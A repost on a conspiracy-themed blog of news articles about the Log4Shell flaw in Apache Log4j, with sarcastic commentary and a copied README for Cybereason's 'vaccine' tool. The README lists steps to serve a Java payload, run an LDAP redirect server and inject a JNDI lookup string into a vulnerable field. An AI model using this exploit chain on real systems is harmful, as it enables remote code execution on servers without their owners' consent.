Digital Doomsday Coming – ConspiracyOz

Dec 12

Posted by

Here it is Ppl ‘Log4sHell’ – Mick Raven

Log4shell software flaw threatens millions of servers as hackers scramble to exploit it

https://www.abc.net.au/
11th Dec 2021

A padlock on a dark background surrounded by white and light blue binary code.

The extreme ease the flaw allows an attacker to access a server is what experts say makes it so dangerous.(Supplied: Accenture)

A critical vulnerability in a widely used software tool — one quickly exploited in the online game Minecraft — is rapidly emerging as a major threat to organisations around the world.

“The internet’s on fire right now,” said Adam Meyers, senior vice-president of intelligence at the cybersecurity firm Crowdstrike.

“People are scrambling to patch [it] and all kinds of people scrambling to exploit it,” he said.

He said on Friday morning, US time, that in the 12 hours since the bug’s existence was disclosed that it had been “fully weaponised”, meaning malefactors had developed and distributed tools to exploit it.

The flaw may be the worst computer vulnerability discovered in years.

It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across industry and government.

Unless it is fixed, it grants criminals, spies and programming novices easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors.

Millions of servers have the logging tool installed, and experts said the fallout would not be known for several days.

Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” — and possibly the biggest in the history of modern computing.

No password required

The vulnerability, dubbed Log4Shell, was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the tool.

Anyone with the ability to exploit it can obtain full access to an unpatched computer that uses the software.

Experts said the extreme ease with which the vulnerability lets an attacker access a web server — without a password — was what made it so dangerous.

Lydia Winters stands on stage with signs showing Microsoft's Minecraft game at the Xbox E3 2015 briefing

Experts say Minecraft users have already exploited the flaw to breach other users by pasting a short message into in a chat box.(AP: Damian Dovarganes, file)

New Zealand’s computer emergency response team was among the first to report that the flaw was being “actively exploited in the wild” just hours after it was publicly reported on Thursday and a patch released.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said.

It took two weeks to develop and release a fix.

But patching systems around the world could be a complicated task.

While most organisations and cloud providers such as Amazon should be able to update their web servers easily, the same Apache software is also often embedded in third-party programs, which often can only be updated by their owners.

Mr Yoran, of Tenable, said organisations needed to presume they had been compromised and act quickly.

The first obvious signs of the flaw’s exploitation appeared in Minecraft, a Microsoft online game hugely popular with children.

Mr Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.

Microsoft said it had issued a software update for Minecraft users.

Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.

Cloudflare’s Mr Sullivan said there was no indication his company’s servers had been compromised.

Apple, Amazon and Twitter did not immediately respond to requests for comment.

AP

Trust in the Digital God now? – Mick Raven

Researchers release ‘vaccine’ for critical Log4Shell vulnerability

Lawrence Abrams
https://www.bleepingcomputer.com
December 10, 2021

Researchers from cybersecurity firm Cybereason has released a “vaccine” that can be used to remotely mitigate the critical ‘Log4Shell’ Apache Log4j code execution vulnerability running rampant through the Internet.

Apache Log4j is a Java-based logging platform that can be used to analyze web server access logs or application logs. The software is heavily used in the enterprise, eCommerce platforms, and games, such as Minecraft who rushed out a patched version earlier today.

Early this morning, researchers released a proof-of-concept exploit for a zero-day remote code execution vulnerability in Apache Log4j tracked as CVE-2021-44228 and dubbed ‘Log4Shell.’

While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, the vulnerability is trivial to exploit, and cybersecurity firms and researchers quickly saw attackers scan and attempt to compromise vulnerable devices.

As threat actors can exploit this vulnerability by simply changing their web browser’s user agent and visiting a vulnerable site or searching for that string on a site, it quickly became a nightmare for the enterprise and some of the most popular websites on the web.

Vaccine released for Log4Shell

Friday evening, cybersecurity firm Cybereason released a script, or “vaccine,” that exploits the vulnerability to turn off a setting in remote, vulnerable Log4Shell instance. Basically, the vaccine fixes the vulnerability by exploiting the vulnerable server.

This project is called ‘Logout4Shell’ and walks you through setting up a Java-based LDAP server and includes a Java payload that will disable the ‘trustURLCodebase’ setting in a remote Log4j server to mitigate the vulnerability.

“While the best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath,” Cybereason explains on the Logout4Shell GitHub Page.

“Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “false”, mitigating this risk.

This may sound like a helpful tool to quickly neutralize the vulnerability in an environment you manage. Still, there are obvious concerns that threat actors or grey hat hackers will co-opt it for illegal behavior.

It is common for threat actors to breach a device and patch vulnerabilities to block other hackers from taking over a compromised server.

There is also concern that security researchers may use the vulnerability to remotely fix servers, even though doing something like this is considered illegal.

However, this has not stopped grey hats from using exploits to take vulnerable devices offline. In the past, we saw the BrickerBot malware take vulnerable routers offline, and gray hates exploiting Internet-connected printers to issue warnings to take them offline.

When we asked Cybereason if they were concerned their Logout4Shell project could be abused, Cybereason CTO Yonatan Striem-Amit told BleepingComputer that they believe the benefits outweigh the potential for abuse in this situation.

While always a possibility, it’s an issue of a calculated risk. This vulnerability is so critical and already massively abused across the Internet, we felt compelled to offer something to help defenders across the globe buy precious time against these hackers.

From an impact perspective, it’s very similar to the Apache Struts vulnerability that was used to steal information from Equifax in May-July 2017.” – Yonatan Striem-Amit, CTO and Co-founder, Cybereason.

If you are interested in trying out Logout4Shell, you can visit the project’s GitHub page.

Vaccine released for the Digital Virus?………BAHAHAHA! I say – Mick Raven

GitHub

https://github.com/Cybereason/Logout4Shell

Dec 2021

Logout4Shell

logo

Description

A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021. The flaw has been dubbed “Log4Shell,”, and has the highest possible severity rating of 10. Software made or managed by the Apache Software Foundation (From here on just “Apache”) is pervasive and comprises nearly a third of all web servers in the world—making this a potentially catastrophic flaw. The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerabe servers.

While the best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath. Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “false”, mitigating this risk.

However, enabling these system property requires access to the vulnerable servers as well as a restart. The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled – this effectively blocks any further attempt to exploit Log4Shell on this server

You can learn more here

How it works

The payload and exploit below use the java runtime to reconfigure the logger. Prior to reconfiguring the global setting FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to True, disabling message format lookups and preventing further exploitation of this attack

How to use

  1. Download this report and build it

    1.1 git clone https://github.com/cybereason/Logout4Shell.ssh

    1.2 build it – mvn package

    1.3 cd target/class

    1.4 run the webserver – python3 -m http.server 8888

  2. Download, build and run Marshalsec’s ldap server

    2.1 git clone https://github.com/mbechler/marshalsec.git

    2.2 mvn package -DskipTests

    2.3 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar
    marshalsec.jndi.LDAPRefServer
    "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE"

  3. To immunize a server

    3.1 enter ${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a} into a vulnerable field (such as user name)

DISCLAIMER:

The code described in this advisory (the “Code”) is provided on an “as is” and “as available” basis may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory.

Credits

The initial repo and inspiration for this work is based on the work of tangxiaofeng7/apache-log4j-poc

Posted on December 12, 2021, in ConspiracyOz Posts. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: